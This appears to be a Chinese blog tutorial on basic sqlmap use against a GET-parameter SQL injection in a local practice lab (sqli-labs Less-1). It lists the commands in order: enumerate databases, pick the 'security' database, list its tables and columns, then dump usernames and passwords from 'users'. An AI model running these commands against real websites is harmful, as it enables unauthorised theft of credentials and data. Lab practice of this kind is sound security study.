zoukankan      html  css  js  c++  java
  • sqlmap基本使用

    sqlmap 使用

    需要安装python2的环境

    使用方法:

    用最基础的get型注入开始

    1、当我们发现注入点的时候,

    python sqlmap.py -u "http://192.168.100.200:8004/Less-1/index.php?id=1"

    2、查看所有的数据库

    python sqlmap.py -u "http://192.168.100.200:8004/Less-1/index.php?id=1" --dbs

    3、查看当前使用的数据库

    python sqlmap.py -u "http://192.168.100.200:8004/Less-1/index.php?id=1" --current-db

    4、发现使用的是security数据库,接下来对此数据库进行查询

    python sqlmap.py -u "http://192.168.100.200:8004/Less-1/index.php?id=1" --tables -D "security"

    5、查出所有表以后,对users表的列名进行查询

    python sqlmap.py -u "http://192.168.100.200:8004/Less-1/index.php?id=1" --columns -T "users" -D "security"

    6、users表中的列名已经知道了,可以直接查出所有数据

    python sqlmap.py -u "http://192.168.100.200:8004/Less-1/index.php?id=1" --dump -C "id,username,password" -T "users" -D "security"



    在“用户”-》“.sqlmap”-》“output”可看到查询结果

  • 相关阅读:
    Mac音频播放
    Mac开发
    CoreFoundation对象的内存管理
    蓝牙收发数据长度的问题
    Android音视频之AudioTrack播放音频(二)
    Android音视频之AudioRecord录音(一)
    wav格式文件、pcm数据
    自定义view 波浪效果
    git 常用命令
    markdown 基本语法
  • 原文地址:https://www.cnblogs.com/gx991010/p/12987201.html
Copyright © 2011-2022 走看看